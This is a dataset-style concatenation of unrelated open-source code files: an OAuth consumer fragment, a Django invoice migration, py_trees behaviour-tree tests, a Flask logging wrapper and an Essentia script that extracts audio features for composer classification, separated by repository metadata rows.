request.session['unauthed_token'] = request_token.to_string()
return self.authorize_token_url(request_token)
def process_authentication_request(self, request):
unauthed_token = request.session.get('unauthed_token', None)
if not unauthed_token:
raise InvalidAuthentication(_('Error, the oauth token is not on the server'))
token = oauth.OAuthToken.from_string(unauthed_token)
if token.key != request.GET.get('oauth_token', 'no-token'):
raise InvalidAuthentication(_("Something went wrong! Auth tokens do not match"))
access_token = self.fetch_access_token(token)
return access_token.to_string()
def get_user_data(self, key):
#token = oauth.OAuthToken.from_string(access_token)
return {}
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_url=self.request_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, None)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.request_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def authorize_token_url(self, token, callback_url=None):
oauth_request = oauth.OAuthRequest.from_token_and_callback(token=token,\
callback=callback_url, http_url=self.authorization_url)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.authorization_url, data)
return full_url
def fetch_access_token(self, token):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, token=token, http_url=self.access_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, token)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.access_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def fetch_data(self, token, http_url, parameters=None):
access_token = oauth.OAuthToken.from_string(token)
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer, token=access_token, http_method="GET",
http_url=http_url, parameters=parameters,
)
oauth_request.sign_request(self.signature_method, self.consumer, access_token)
url = oauth_request.to_url()
connection = httplib.HTTPSConnection(self.server_url)
connection.request(oauth_request.http_method, url)
return connection.getresponse().read()
| gpl-3.0 | -633,388,579,268,110,200 | 41.735632 | 126 | 0.686391 | false |
mferenca/HMS-ecommerce | ecommerce/invoice/migrations/0001_initial.py | 1 | 2891 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import django.utils.timezone
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('basket', '0006_basket_site'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalInvoice',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('basket', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='basket.Basket', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical invoice',
},
),
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('basket', models.ForeignKey(to='basket.Basket')),
],
options={
'ordering': ('-modified', '-created'),
'abstract': False,
'get_latest_by': 'modified',
},
),
]
| agpl-3.0 | 945,000,647,318,833,700 | 53.54717 | 176 | 0.603597 | false |
stonier/py_trees_suite | tests/test_imposter.py | 1 | 5252 | #!/usr/bin/env python
#
# License: BSD
# https://raw.githubusercontent.com/stonier/py_trees/devel/LICENSE
#
##############################################################################
# Imports
##############################################################################
# enable some python3 compatibility options:
# (unicode_literals not compatible with python2 uuid module)
from __future__ import absolute_import, print_function
import py_trees
import py_trees.console as console
##############################################################################
# Logging Level
##############################################################################
py_trees.logging.level = py_trees.logging.Level.DEBUG
logger = py_trees.logging.Logger("Nosetest")
##############################################################################
# Helpers
##############################################################################
def create_impostered_composite():
return py_trees.meta.failure_is_running(py_trees.composites.Sequence)(name="Impostered Composite")
def create_impostered_behaviour():
return py_trees.meta.success_is_failure(py_trees.behaviours.Success)(name="Impostered Behaviour")
def has_child_with_name(parent, child_name):
return child_name if child_name in [c.name for c in parent.children] else None
##############################################################################
# Tests
##############################################################################
def test_imposter_has_add_child_method():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Imposter has add_child_method" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
tuples = []
tuples.append((create_impostered_behaviour(), False))
tuples.append((create_impostered_composite(), True))
for b, asserted_result in tuples:
print("%s has add_child: %s [%s]" % (b.name, hasattr(b, 'add_child'), asserted_result))
assert(hasattr(b, 'add_child') == asserted_result)
def test_parent_chain():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Parent Chain" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
root = py_trees.composites.Parallel("Root")
sequence_failure_is_running = create_impostered_composite()
success_is_failure = create_impostered_behaviour()
sequence_failure_is_running.add_child(success_is_failure)
root.add_child(sequence_failure_is_running)
tuples = []
tuples.append((success_is_failure, sequence_failure_is_running.name))
tuples.append((sequence_failure_is_running, root.name))
for child, asserted_result in tuples:
print("%s's parent: %s [%s]" % (child.name, child.parent.name, asserted_result))
assert(child.parent.name == asserted_result)
def test_parent_chain_with_add_children():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Parent Chain with add_children" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
root = py_trees.composites.Parallel("Root")
sequence_failure_is_running = create_impostered_composite()
success_is_failure = create_impostered_behaviour()
sequence_failure_is_running.add_children([success_is_failure])
root.add_children([sequence_failure_is_running])
tuples = []
tuples.append((success_is_failure, sequence_failure_is_running.name))
tuples.append((sequence_failure_is_running, root.name))
for child, asserted_result in tuples:
print("%s's parent: %s [%s]" % (child.name, child.parent.name, asserted_result))
assert(child.parent.name == asserted_result)
def test_child_chain():
print(console.bold + "\n****************************************************************************************" + console.reset)
print(console.bold + "* Test Child Chain" + console.reset)
print(console.bold + "****************************************************************************************\n" + console.reset)
root = py_trees.composites.Parallel("Root")
sequence_failure_is_running = create_impostered_composite()
success_is_failure = create_impostered_behaviour()
sequence_failure_is_running.add_child(success_is_failure)
root.add_child(sequence_failure_is_running)
tuples = []
tuples.append((root, sequence_failure_is_running.name))
tuples.append((sequence_failure_is_running, success_is_failure.name))
for parent, asserted_result in tuples:
print("%s's child: %s [%s]" % (parent.name, has_child_with_name(parent, asserted_result), asserted_result))
assert(has_child_with_name(parent, asserted_result) == asserted_result)
| bsd-3-clause | -4,852,281,155,048,690,000 | 46.315315 | 134 | 0.52342 | false |
bayazee/flacon | flacon/utils/extended_logging.py | 1 | 6366 | import sys
from flask import _request_ctx_stack
def wrap_app_logger(app):
"""
This function given Application and add logger for that.
:param app: Application Object
:type app: Object
"""
app.debug_log_format = app.config['LOG_FORMAT']
app._logger = None
app._logger = LoggerWrapper(app.logger, app.logger_name)
if not app.debug:
from logging import StreamHandler, DEBUG, Formatter
handler = StreamHandler()
handler.setLevel(app.config.get('LOG_LEVEL', DEBUG))
handler.setFormatter(Formatter(app.config.get('LOG_FORMAT', app.debug_log_format)))
app._logger.addHandler(handler)
app.logger.info('Starting project')
class LoggerWrapper(object):
"""
This Class initial and make Logger wrapper.
:param logger: Logger instance object
:type logger: Object
:param logger_name: Name for save logger as it
"type logger_name: String
"""
def __init__(self, logger, logger_name):
self.logger_name = logger_name
self.logger = logger
self.extra_handlers = []
def process(self, msg, args, kwargs):
"""
This function given message as msg and argument as args and kwargs, then create logger messages.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
:returns: Set of msg, args, kwargs.
:rtype: Set
"""
path = method = remote_addr = user_agent = url = u''
ctx = _request_ctx_stack.top
if ctx is not None:
path = ctx.request.path
url = ctx.request.url
method = ctx.request.method
remote_addr = ctx.request.remote_addr
user_agent = ctx.request.headers.get('user-agent', u'')
kwargs['extra'] = dict(
logger_name=self.logger_name,
http_path=path,
http_url=url,
http_method=method,
http_remote_addr=remote_addr,
http_user_agent=user_agent
)
for handler in self.extra_handlers:
kwargs['extra'].update(handler(ctx))
if args:
# if isinstance(args[0], dict):
msg = msg + ' ' + repr(args[0])
return msg, [], kwargs
def create_logger(self, name):
"""
This Function create Logger with given name.
:param name: Logger name for creating logger
:type name: String
"""
assert not hasattr(self, name)
setattr(self, name, LoggerWrapper(self.logger, name))
def debug(self, msg, *args, **kwargs):
"""
This function create and execute log with Debug mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.debug(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
This function create and execute log with Info mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.info(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
This function create and execute log with Warning mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
This function create and execute log with Error mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.error(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
This function create and execute log for exception raise error.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
kwargs['exc_info'] = sys.exc_info()
self.logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
This function create and execute log with Critical mode.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
This function create and execute log.
:param msg: body of message
:type msg: String
:param args: list of parameter's
:type args: List
:param kwargs: Dict of arqument's attribute
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def __getattr__(self, name):
return getattr(self.logger, name)
@property
def inject(self, f):
"""
:example:
.. code-block:: python
app.logger.inject
def log_user(ctx):
d = {}
d['app_user'] = 'anonymous'
if ctx is not None and ctx.g.user is not None:
d['app_user'] = ctx.g.user.mailbox
return d
"""
self.extra_handlers.append(f)
return f
| bsd-3-clause | -2,105,913,396,540,555,800 | 29.170616 | 104 | 0.570531 | false |
GermanRuizMarcos/Classical-Composer-Classification | code_7_1/classification.py | 1 | 18072 | '''
AUDIO CLASSICAL COMPOSER IDENTIFICATION BASED ON:
A SPECTRAL BANDWISE FEATURE-BASED SYSTEM
'''
import essentia
from essentia.standard import *
import glob
import numpy as np
import arff
from essentia.standard import *
from scipy import stats
# Dataset creation with specific attributes (spectral features) and a specific class (composer's name)
'''
Audio files trasformed into the frequency domain through a 1024-sample STFT with 50% overlap.
The spectrum is divided into 50 mel-spaced bands.
'''
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/bach/*.wav")
fft = FFT()
melbands = MelBands(numberBands = 50)
flatness = FlatnessDB()
rolloff = RollOff()
centroid = SpectralCentroidTime()
flux = Flux()
energy = EnergyBand()
zero = ZeroCrossingRate()
spectrum = Spectrum()
w = Windowing(type = 'hann')
mfcc = MFCC()
f = open('definitive_train.txt', 'wb')
f.write('@RELATION "composer dataset"\n')
f.write('\n')
f.write('@ATTRIBUTE MFCC-0 REAL\n')
f.write('@ATTRIBUTE MFCC-1 REAL\n')
f.write('@ATTRIBUTE MFCC-2 REAL\n')
f.write('@ATTRIBUTE MFCC-3 REAL\n')
f.write('@ATTRIBUTE MFCC-4 REAL\n')
f.write('@ATTRIBUTE MFCC-5 REAL\n')
f.write('@ATTRIBUTE MFCC-6 REAL\n')
f.write('@ATTRIBUTE MFCC-7 REAL\n')
f.write('@ATTRIBUTE MFCC-8 REAL\n')
f.write('@ATTRIBUTE MFCC-9 REAL\n')
f.write('@ATTRIBUTE MFCC-10 REAL\n')
f.write('@ATTRIBUTE MFCC-11 REAL\n')
f.write('@ATTRIBUTE MFCC-12 REAL\n')
f.write('@ATTRIBUTE flatness-mean REAL\n')
f.write('@ATTRIBUTE flatness-variance REAL\n')
f.write('@ATTRIBUTE rolloff-mean REAL\n')
f.write('@ATTRIBUTE rolloff-variance REAL\n')
f.write('@ATTRIBUTE centroid-mean REAL\n')
f.write('@ATTRIBUTE centroid-variance REAL\n')
f.write('@ATTRIBUTE flux-mean REAL\n')
f.write('@ATTRIBUTE flux-variance REAL\n')
f.write('@ATTRIBUTE energy-mean REAL\n')
f.write('@ATTRIBUTE energy-variance REAL\n')
f.write('@ATTRIBUTE ZCR-mean REAL\n')
f.write('@ATTRIBUTE ZCR-variance REAL\n')
f.write('@ATTRIBUTE flatness-std REAL\n')
f.write('@ATTRIBUTE flatness-hmean REAL\n')
f.write('@ATTRIBUTE composer {bach, beethoven, chopin, haydn, liszt, mendelssohn, mozart, vivaldi}\n')
f.write('\n')
f.write('@DATA\n')
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'bach'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 2
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/beethoven/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'beethoven'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 3
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/chopin/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'chopin'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 4
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/haydn/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'haydn'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 5
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/liszt/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'liszt'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 6
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/mendelssohn/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'mendelssohn'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 7
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/mozart/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'mozart'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 8
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/vivaldi/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
